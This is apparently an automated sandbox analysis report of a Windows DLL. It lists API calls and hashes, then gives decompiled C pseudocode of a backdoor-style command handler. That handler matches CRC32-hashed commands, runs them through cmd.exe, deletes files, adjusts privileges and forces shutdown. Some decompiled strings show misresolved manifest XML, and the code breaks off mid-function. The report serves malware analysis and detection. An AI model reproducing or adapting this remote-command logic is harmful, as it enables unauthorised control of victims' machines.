                                                                                                                        0x6f336fd3
                                                                                                                        0x6f336fe8
                                                                                                                        0x6f336fea
                                                                                                                        0x6f336ff2
                                                                                                                        0x6f336ffa
                                                                                                                        0x6f337002
                                                                                                                        0x6f33776f
                                                                                                                        0x6f337776
                                                                                                                        0x00000000
                                                                                                                        0x6f337008
                                                                                                                        0x00000000
                                                                                                                        0x6f337014
                                                                                                                        0x6f337018
                                                                                                                        0x6f33703a
                                                                                                                        0x6f33701a
                                                                                                                        0x6f33701a
                                                                                                                        0x6f33701f
                                                                                                                        0x6f337023
                                                                                                                        0x6f33702a
                                                                                                                        0x6f337031
                                                                                                                        0x6f337031
                                                                                                                        0x6f337044
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337059
                                                                                                                        0x6f33706a
                                                                                                                        0x6f33773e
                                                                                                                        0x6f337746
                                                                                                                        0x6f337757
                                                                                                                        0x6f33775f
                                                                                                                        0x6f337010
                                                                                                                        0x00000000
                                                                                                                        0x6f337010
                                                                                                                        0x00000000
                                                                                                                        0x6f337765
                                                                                                                        0x6f337077
                                                                                                                        0x6f337077
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33707f
                                                                                                                        0x6f33708b
                                                                                                                        0x6f337090
                                                                                                                        0x6f33709a
                                                                                                                        0x6f3370ae
                                                                                                                        0x6f3370af
                                                                                                                        0x6f3370b2
                                                                                                                        0x6f3370b3
                                                                                                                        0x6f3370b6
                                                                                                                        0x6f3370bb
                                                                                                                        0x6f3370c0
                                                                                                                        0x6f3370d5
                                                                                                                        0x6f3370d9
                                                                                                                        0x6f3370df
                                                                                                                        0x6f3370e4
                                                                                                                        0x6f33710b
                                                                                                                        0x6f337121
                                                                                                                        0x6f337123
                                                                                                                        0x6f337128
                                                                                                                        0x6f337131
                                                                                                                        0x6f33713f
                                                                                                                        0x6f33713f
                                                                                                                        0x6f337128
                                                                                                                        0x6f337145
                                                                                                                        0x6f337151
                                                                                                                        0x6f337155
                                                                                                                        0x6f33715e
                                                                                                                        0x6f337162
                                                                                                                        0x6f33716c
                                                                                                                        0x6f33717c
                                                                                                                        0x6f33717c
                                                                                                                        0x6f337191
                                                                                                                        0x6f33719a
                                                                                                                        0x6f33719c
                                                                                                                        0x6f3371a1
                                                                                                                        0x6f3371b0
                                                                                                                        0x6f3371be
                                                                                                                        0x6f3371be
                                                                                                                        0x6f3371ce
                                                                                                                        0x6f3371d2
                                                                                                                        0x6f3371da
                                                                                                                        0x6f3371e0
                                                                                                                        0x6f3371ec
                                                                                                                        0x6f3371f0
                                                                                                                        0x6f3371f6
                                                                                                                        0x6f3371fc
                                                                                                                        0x6f337212
                                                                                                                        0x6f337222
                                                                                                                        0x6f337227
                                                                                                                        0x6f33722b
                                                                                                                        0x6f337232
                                                                                                                        0x6f33723d
                                                                                                                        0x6f337246
                                                                                                                        0x6f33724f
                                                                                                                        0x6f337256
                                                                                                                        0x6f33725d
                                                                                                                        0x6f337263
                                                                                                                        0x6f33726f
                                                                                                                        0x6f337270
                                                                                                                        0x6f337271
                                                                                                                        0x6f337272
                                                                                                                        0x6f337279
                                                                                                                        0x6f33728f
                                                                                                                        0x6f337291
                                                                                                                        0x6f337296
                                                                                                                        0x6f3372a2
                                                                                                                        0x6f3372b0
                                                                                                                        0x6f3372b0
                                                                                                                        0x6f337296
                                                                                                                        0x6f3372bb
                                                                                                                        0x6f3372bb
                                                                                                                        0x6f33725d
                                                                                                                        0x6f3371fc
                                                                                                                        0x6f3372c4
                                                                                                                        0x6f3372c6
                                                                                                                        0x6f3372ca
                                                                                                                        0x6f3372ce
                                                                                                                        0x6f3372d2
                                                                                                                        0x6f3372d8
                                                                                                                        0x6f337367
                                                                                                                        0x6f337367
                                                                                                                        0x6f33736b
                                                                                                                        0x6f337376
                                                                                                                        0x6f337378
                                                                                                                        0x6f337386
                                                                                                                        0x6f337390
                                                                                                                        0x6f337396
                                                                                                                        0x6f33739c
                                                                                                                        0x6f3373a3
                                                                                                                        0x6f3373a5
                                                                                                                        0x6f3373a9
                                                                                                                        0x6f3373ac
                                                                                                                        0x6f3373ac
                                                                                                                        0x6f33739c
                                                                                                                        0x6f3373bb
                                                                                                                        0x6f3373bf
                                                                                                                        0x6f3373c6
                                                                                                                        0x6f3373ca
                                                                                                                        0x6f3373ce
                                                                                                                        0x6f3373d2
                                                                                                                        0x6f3373d6
                                                                                                                        0x6f3373d9
                                                                                                                        0x6f3373dc
                                                                                                                        0x6f337412
                                                                                                                        0x6f337412
                                                                                                                        0x6f337416
                                                                                                                        0x00000000
                                                                                                                        0x6f3373de
                                                                                                                        0x6f3373de
                                                                                                                        0x6f3373e7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3373ec
                                                                                                                        0x6f3373f2
                                                                                                                        0x6f3373f8
                                                                                                                        0x6f3373ff
                                                                                                                        0x6f337409
                                                                                                                        0x6f33740d
                                                                                                                        0x6f337419
                                                                                                                        0x6f33741d
                                                                                                                        0x6f337422
                                                                                                                        0x6f337423
                                                                                                                        0x6f337427
                                                                                                                        0x6f337434
                                                                                                                        0x6f33743b
                                                                                                                        0x6f33743f
                                                                                                                        0x6f337441
                                                                                                                        0x6f337448
                                                                                                                        0x6f337450
                                                                                                                        0x6f337453
                                                                                                                        0x6f337461
                                                                                                                        0x6f337466
                                                                                                                        0x6f33746d
                                                                                                                        0x6f337470
                                                                                                                        0x6f337474
                                                                                                                        0x6f33747a
                                                                                                                        0x6f337487
                                                                                                                        0x6f337491
                                                                                                                        0x6f337496
                                                                                                                        0x6f337496
                                                                                                                        0x6f33749d
                                                                                                                        0x6f3374a2
                                                                                                                        0x6f3374a3
                                                                                                                        0x6f3374ac
                                                                                                                        0x6f3374ae
                                                                                                                        0x6f3374b7
                                                                                                                        0x6f3374bc
                                                                                                                        0x6f3374c6
                                                                                                                        0x6f3374d3
                                                                                                                        0x6f3374d3
                                                                                                                        0x6f3374d9
                                                                                                                        0x6f3374df
                                                                                                                        0x6f33763f
                                                                                                                        0x6f33763f
                                                                                                                        0x6f337648
                                                                                                                        0x6f337649
                                                                                                                        0x6f337656
                                                                                                                        0x6f33766e
                                                                                                                        0x6f337678
                                                                                                                        0x6f33767c
                                                                                                                        0x6f337680
                                                                                                                        0x6f337685
                                                                                                                        0x6f33768b
                                                                                                                        0x6f337698
                                                                                                                        0x6f33769f
                                                                                                                        0x6f3376a4
                                                                                                                        0x6f3376ac
                                                                                                                        0x6f337706
                                                                                                                        0x6f33770a
                                                                                                                        0x6f33770f
                                                                                                                        0x6f33770f
                                                                                                                        0x6f3376ae
                                                                                                                        0x6f3376ae
                                                                                                                        0x6f3376b4
                                                                                                                        0x6f3376b7
                                                                                                                        0x6f3376b9
                                                                                                                        0x6f3376b9
                                                                                                                        0x6f3376d6
                                                                                                                        0x6f3376dc
                                                                                                                        0x6f3376e2
                                                                                                                        0x6f3376e6
                                                                                                                        0x6f3376fa
                                                                                                                        0x6f3376fa
                                                                                                                        0x00000000
                                                                                                                        0x6f3374e5
                                                                                                                        0x6f3374e8
                                                                                                                        0x6f3374fd
                                                                                                                        0x6f337502
                                                                                                                        0x6f337507
                                                                                                                        0x6f33750e
                                                                                                                        0x6f337517
                                                                                                                        0x6f33751d
                                                                                                                        0x6f337522
                                                                                                                        0x6f337530
                                                                                                                        0x6f337538
                                                                                                                        0x6f33753f
                                                                                                                        0x6f337544
                                                                                                                        0x6f33754a
                                                                                                                        0x6f33754e
                                                                                                                        0x6f337556
                                                                                                                        0x6f337558
                                                                                                                        0x6f337558
                                                                                                                        0x6f337562
                                                                                                                        0x6f337569
                                                                                                                        0x6f337589
                                                                                                                        0x6f33758a
                                                                                                                        0x6f33758b
                                                                                                                        0x6f33758c
                                                                                                                        0x6f33756b
                                                                                                                        0x6f337573
                                                                                                                        0x6f337576
                                                                                                                        0x6f33757d
                                                                                                                        0x6f337582
                                                                                                                        0x6f337586
                                                                                                                        0x6f337586
                                                                                                                        0x6f33758d
                                                                                                                        0x6f337592
                                                                                                                        0x6f337599
                                                                                                                        0x6f3375bd
                                                                                                                        0x6f3375cd
                                                                                                                        0x6f3375d7
                                                                                                                        0x6f3375dc
                                                                                                                        0x6f3375e1
                                                                                                                        0x6f3375e7
                                                                                                                        0x6f3375f1
                                                                                                                        0x6f33760c
                                                                                                                        0x6f337617
                                                                                                                        0x6f33761d
                                                                                                                        0x6f33761d
                                                                                                                        0x6f337599
                                                                                                                        0x6f337517
                                                                                                                        0x6f33762f
                                                                                                                        0x6f337639
                                                                                                                        0x6f337712
                                                                                                                        0x6f337712
                                                                                                                        0x6f337718
                                                                                                                        0x6f33771a
                                                                                                                        0x6f33771e
                                                                                                                        0x6f337721
                                                                                                                        0x6f337721
                                                                                                                        0x6f33771e
                                                                                                                        0x6f337727
                                                                                                                        0x6f33773c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337639
                                                                                                                        0x6f3374df
                                                                                                                        0x6f3372de
                                                                                                                        0x6f3372de
                                                                                                                        0x6f3372e4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3372f1
                                                                                                                        0x6f3372f5
                                                                                                                        0x00000000
                                                                                                                        0x6f3372f7
                                                                                                                        0x6f3372f9
                                                                                                                        0x6f337300
                                                                                                                        0x6f337300
                                                                                                                        0x6f33730a
                                                                                                                        0x6f337321
                                                                                                                        0x6f337323
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33733c
                                                                                                                        0x6f337340
                                                                                                                        0x6f33735b
                                                                                                                        0x6f33735b
                                                                                                                        0x6f33735d
                                                                                                                        0x6f337361
                                                                                                                        0x6f337361
                                                                                                                        0x6f337365
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f337342
                                                                                                                        0x6f337342
                                                                                                                        0x6f337353
                                                                                                                        0x6f337355
                                                                                                                        0x6f337355
                                                                                                                        0x6f337356
                                                                                                                        0x6f337357
                                                                                                                        0x00000000
                                                                                                                        0x6f33732a
                                                                                                                        0x6f33732a
                                                                                                                        0x6f33732c
                                                                                                                        0x6f33732d
                                                                                                                        0x6f337331
                                                                                                                        0x6f337338
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33733a
                                                                                                                        0x6f3372d8
                                                                                                                        0x6f33705b
                                                                                                                        0x00000000
                                                                                                                        0x6f337767
                                                                                                                        0x6f337769
                                                                                                                        0x00000000
                                                                                                                        0x6f337769
                                                                                                                        0x6f337002

                                                                                                                        APIs
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F336D67
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000004,?,00000014), ref: 6F336D7B
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000014), ref: 6F336D95
                                                                                                                        • GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000009,?,00000014), ref: 6F336DAB
                                                                                                                        • CharLowerW.USER32(?), ref: 6F336DB9
                                                                                                                        • RtlZeroMemory.NTDLL(6F3403A0,0000009C), ref: 6F336DC9
                                                                                                                        • RtlGetNtVersionNumbers.NTDLL ref: 6F336DF3
                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00000034), ref: 6F336E8A
                                                                                                                        • RtlMoveMemory.NTDLL(00000034,00000000,?), ref: 6F336F29
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000034,00000000,?), ref: 6F336F30
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336F37
                                                                                                                        • RtlMoveMemory.NTDLL(00000035,00000000,?), ref: 6F336F6C
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000035,00000000,?), ref: 6F336F73
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F336F7A
                                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,?), ref: 6F336FB3
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 6F336FBA
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?), ref: 6F336FC1
                                                                                                                          • Part of subcall function 6F331DB0: lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,6F339D7B), ref: 6F331E3E
                                                                                                                          • Part of subcall function 6F331DB0: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 6F331E48
                                                                                                                        • SetTimer.USER32(00000000,00000000,00000000,00000000), ref: 6F336FD7
                                                                                                                        • GetMessageA.USER32 ref: 6F336FFA
                                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 6F33707F
                                                                                                                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 6F3370B6
                                                                                                                        • wsprintfW.USER32 ref: 6F3370D9
                                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 6F337103
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 6F337131
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 6F337138
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6F33713F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Memory$Heap$Zero$FreeMoveProcess$Timer$AllocCharComputeCrc32InfoKillLocaleLowerMessageNumbersPrivateProfileStringVersionVirtuallstrlenwsprintf
                                                                                                                        • String ID: %lu$%s\%s$($PWD$gd$gd
                                                                                                                        • API String ID: 2388189746-3190195910
                                                                                                                        • Opcode ID: 80f712e55549b22a6bc847b499d5d2cd2fae28a9d17684c2f04df2f84591e558
                                                                                                                        • Instruction ID: 3f8193a05892ecb1d658e38f96214ad2619d243b80bf7ca49f5b8d62d593e374
                                                                                                                        • Opcode Fuzzy Hash: 80f712e55549b22a6bc847b499d5d2cd2fae28a9d17684c2f04df2f84591e558
                                                                                                                        • Instruction Fuzzy Hash: 16529DB2908385AFD720DF64C884EABBBEDFB89714F00891DF58587241D775E858CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F335B40, Relevance: 104.0, APIs: 48, Strings: 11, Instructions: 721memorysleepstringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E6F335B40() {
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t91;
				void* _t95;
				char _t106;
				char _t109;
				int _t115;
				char* _t133;
				char _t136;
				int _t150;
				WCHAR* _t152;
				int _t153;
				int _t154;
				int _t155;
				char* _t156;
				long _t159;
				char* _t163;
				int _t168;
				int _t169;
				long _t174;
				char _t175;
				long _t177;
				int _t180;
				int _t185;
				char _t186;
				int _t193;
				struct HWND__* _t197;
				intOrPtr* _t202;
				int _t203;
				int _t204;
				char* _t206;
				void* _t209;
				void* _t213;
				char _t218;
				char _t219;
				char _t223;
				char _t226;
				CHAR* _t227;
				struct HWND__* _t232;
				intOrPtr _t233;
				int _t234;
				char _t238;
				char _t254;
				CHAR* _t256;
				CHAR* _t257;
				struct HWND__* _t258;
				intOrPtr _t259;
				long _t262;
				long _t264;
				int _t265;
				signed int _t271;
				int _t276;
				int _t279;
				void* _t280;
				int _t281;
				void* _t282;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t291;
				void* _t298;
				void* _t299;

				_t209 =  *(_t282 + 0x130);
				 *(_t282 + 0x1c) = 0;
				_t280 = E6F33A3D0( *(_t209 + 0xc), _t282 + 0x14);
				_t283 = _t282 + 8;
				 *(_t283 + 0x10) = _t280;
				if(_t280 == 0) {
					L133:
					_t91 =  *_t209;
					if(_t91 != 0) {
						WaitForSingleObject(_t91, 0xffffffff);
						CloseHandle( *_t209);
					}
					HeapFree(GetProcessHeap(), 0,  *(_t209 + 0xc));
					_t95 =  *(_t209 + 0x14);
					if(_t95 != 0) {
						HeapFree(GetProcessHeap(), 0, _t95);
					}
					HeapFree(GetProcessHeap(), 0, _t209);
					return 0;
				}
				if( *((intOrPtr*)(_t283 + 0x14)) <= 0) {
					L132:
					LocalFree(_t280);
					goto L133;
				}
				CharLowerA( *_t280);
				_t106 =  *( *_t280);
				if(_t106 < 0x61 || _t106 > 0x7a) {
					if(_t106 != 0x21) {
						E6F335AF0(_t209, 4, 0, 0);
						goto L132;
					}
					goto L5;
				} else {
					L5:
					_t109 = HeapAlloc(GetProcessHeap(), 8, 0x400);
					 *(_t283 + 0x18) = _t109;
					if(_t109 == 0) {
						goto L132;
					}
					_t262 = lstrlenA( *_t280);
					_t271 = RtlComputeCrc32(0,  *_t280, _t262) ^ 0x00435a88;
					_t298 = _t271 - 0x539b9257;
					if(_t298 > 0) {
						__eflags = _t271 - 0xcd8eabe7;
						if(__eflags > 0) {
							__eflags = _t271 - 0xe7ba788f;
							if(__eflags > 0) {
								__eflags = _t271 - 0xf06cffa0;
								if(_t271 == 0xf06cffa0) {
									L13:
									if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
										wsprintfA( *(_t283 + 0x18), "/c %s",  *(_t209 + 0xc) + _t262 + 1);
										_t285 = _t283 + 0xc;
										__eflags = _t271 - 0x876bcf36;
										if(_t271 == 0x876bcf36) {
											L124:
											_t213 = 0x384;
											L125:
											__eflags = _t271 - 0x2f1f4648;
											if(_t271 == 0x2f1f4648) {
												L128:
												_t115 = 0;
												__eflags = 0;
												L129:
												_push(0);
												_push(_t213);
												_push(_t115);
												E6F335AF0(_t209, E6F334230(0, "cmd.exe",  *((intOrPtr*)(_t285 + 0x24))), 0, 0);
												_t283 = _t285 + 0x28;
												goto L130;
											}
											__eflags = _t271 - 0x876bcf36;
											if(_t271 == 0x876bcf36) {
												goto L128;
											}
											_t115 = 1;
											goto L129;
										}
										__eflags = _t271 - 0x4779d712;
										if(_t271 == 0x4779d712) {
											goto L124;
										}
										__eflags = _t271 - 0x2965d6c5;
										if(_t271 == 0x2965d6c5) {
											goto L124;
										}
										_t213 = 0;
										goto L125;
									} else {
										E6F335AF0(_t209, 2, 0, 0);
										_t283 = _t283 + 0x10;
										L130:
										HeapFree(GetProcessHeap(), 0,  *(_t283 + 0x18));
										goto L132;
									}
								}
								__eflags = _t271 - 0xf4d35c00;
								if(_t271 == 0xf4d35c00) {
									_push(0);
									_push(0);
									_push(0x65);
									L84:
									_push(E6F335190());
									_push(_t209);
									E6F335AF0();
									_t283 = _t283 + 0x14;
									goto L130;
								}
								__eflags = _t271 - 0xf7013bb9;
								if(_t271 == 0xf7013bb9) {
									__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 2;
									if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
										_t238 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x996628
										wsprintfA( *(_t283 + 0x18), "\"%s%s\" /c %s", _t238, "cmd.exe",  *(_t209 + 0xc) + _t262 + 1);
										_push(_t283 + 0x24);
										_push(0x384);
										 *(_t283 + 0x30) = 0;
										__eflags = E6F332ED0( *(_t283 + 0x18));
										E6F335AF0(_t209, 0 | E6F332ED0( *(_t283 + 0x18)) != 0x00000000, _t127,  *(_t283 + 0x30));
										_t283 = _t283 + 0x30;
										goto L130;
									}
									L117:
									E6F335AF0(_t209, 2, 0, 0);
									_t283 = _t283 + 0x10;
									goto L130;
								}
								L115:
								E6F335AF0(_t209, 4, 0, 0);
								_t283 = _t283 + 0x10;
								goto L130;
							}
							if(__eflags == 0) {
								L107:
								__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 1;
								if( *((intOrPtr*)(_t283 + 0x14)) <= 1) {
									L111:
									E6F335060(5, 0, 0);
									_t283 = _t283 + 0xc;
									goto L130;
								}
								_t133 =  *((intOrPtr*)(_t280 + 4));
								__eflags =  *_t133 - 0x67;
								if( *_t133 != 0x67) {
									goto L111;
								}
								__eflags =  *((char*)(_t133 + 1));
								if( *((char*)(_t133 + 1)) != 0) {
									goto L111;
								}
								E6F335060(5, 1, 0);
								_t283 = _t283 + 0xc;
								goto L130;
							}
							__eflags = _t271 - 0xd4c57ba8;
							if(_t271 == 0xd4c57ba8) {
								__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 2;
								_push(".pdll");
								if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
									_t136 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
									_push( *((intOrPtr*)(_t280 + 4)));
									_push(_t136);
									wsprintfA(_t283 + 0x3c, "%s%s%s");
									_t287 = _t283 + 0x14;
									E6F335AF0(_t209, DeleteFileA(_t287 + 0x30), 0, 0);
									_t283 = _t287 + 0x10;
								} else {
									_t218 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
									_push(_t218);
									E6F335AF0(_t209, E6F332DF0(), 0, 0);
									_t283 = _t283 + 0x18;
								}
								goto L130;
							}
							__eflags = _t271 - 0xdf32d24a;
							if(_t271 == 0xdf32d24a) {
								__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 2;
								if( *((intOrPtr*)(_t283 + 0x14)) >= 2) {
									_t219 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
									wsprintfA(_t283 + 0x3c, "%s%s%s", _t219,  *((intOrPtr*)(_t280 + 4)), ".pdll");
									E6F335AF0(_t209, E6F332750(_t283 + 0x44), 0, 0);
									_t283 = _t283 + 0x28;
								} else {
									_push(0);
									E6F3328B0(".pdll");
									E6F335AF0(_t209, 1, 0, 0);
									_t283 = _t283 + 0x18;
								}
								goto L130;
							}
							__eflags = _t271 - 0xe6f1017f;
							if(_t271 != 0xe6f1017f) {
								goto L115;
							}
							L90:
							_t150 = OpenProcessToken(0xffffffff, 0x28, _t283 + 0x10);
							__eflags = _t150;
							if(_t150 == 0) {
								L98:
								E6F335AF0(_t209, 0, 0, 0);
								_t283 = _t283 + 0x10;
								goto L130;
							}
							_t152 = M6F340568; // 0x74cec0
							_t153 = LookupPrivilegeValueW(0, _t152, _t283 + 0x24);
							__eflags = _t153;
							if(_t153 == 0) {
								goto L98;
							}
							 *(_t283 + 0x38) = 1;
							 *((intOrPtr*)(_t283 + 0x44)) = 2;
							_t154 = AdjustTokenPrivileges( *(_t283 + 0x10), 0, _t283 + 0x2c, 0, 0, 0);
							__eflags = _t154;
							if(_t154 == 0) {
								goto L98;
							}
							asm("sbb esi, esi");
							_t276 = ( ~(_t271 - 0xc110de04) & 0x00000006) + 2;
							__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 1;
							if( *((intOrPtr*)(_t283 + 0x14)) > 1) {
								_t156 =  *((intOrPtr*)(_t280 + 4));
								__eflags =  *_t156 - 0x66;
								if( *_t156 == 0x66) {
									__eflags =  *((char*)(_t156 + 1));
									if( *((char*)(_t156 + 1)) == 0) {
										_t276 = _t276 | 0x00000014;
										__eflags = _t276;
									}
								}
							}
							_t155 = ExitWindowsEx(_t276, 0);
							__eflags = _t155;
							if(_t155 != 0) {
								goto L130;
							} else {
								goto L98;
							}
						}
						if(__eflags == 0) {
							_push(0);
							_push(0);
							_push(0x66);
							goto L84;
						}
						__eflags = _t271 - 0xb3beafae;
						if(__eflags > 0) {
							__eflags = _t271 - 0xb9154c3e;
							if(_t271 == 0xb9154c3e) {
								E6F335060(5, 0, 1);
								_t283 = _t283 + 0xc;
								goto L130;
							}
							__eflags = _t271 - 0xc110de04;
							if(_t271 == 0xc110de04) {
								goto L90;
							}
							__eflags = _t271 - 0xc52dedf4;
							if(_t271 != 0xc52dedf4) {
								goto L115;
							}
							_push(0);
							_push(0);
							_push(0x75);
							goto L84;
						}
						if(__eflags == 0) {
							L57:
							__eflags =  *((intOrPtr*)(_t283 + 0x14)) - 3;
							if( *((intOrPtr*)(_t283 + 0x14)) >= 3) {
								_t281 = 0;
								 *(_t283 + 0x30) = 0;
								__eflags = _t271 - 0x539b9257;
								if(_t271 != 0x539b9257) {
									_t264 =  *(_t283 + 0x10);
									_t159 = ExpandEnvironmentStringsA( *(_t264 + 8), _t283 + 0x34, 0x104);
									__eflags = _t159;
									if(_t159 == 0) {
										L63:
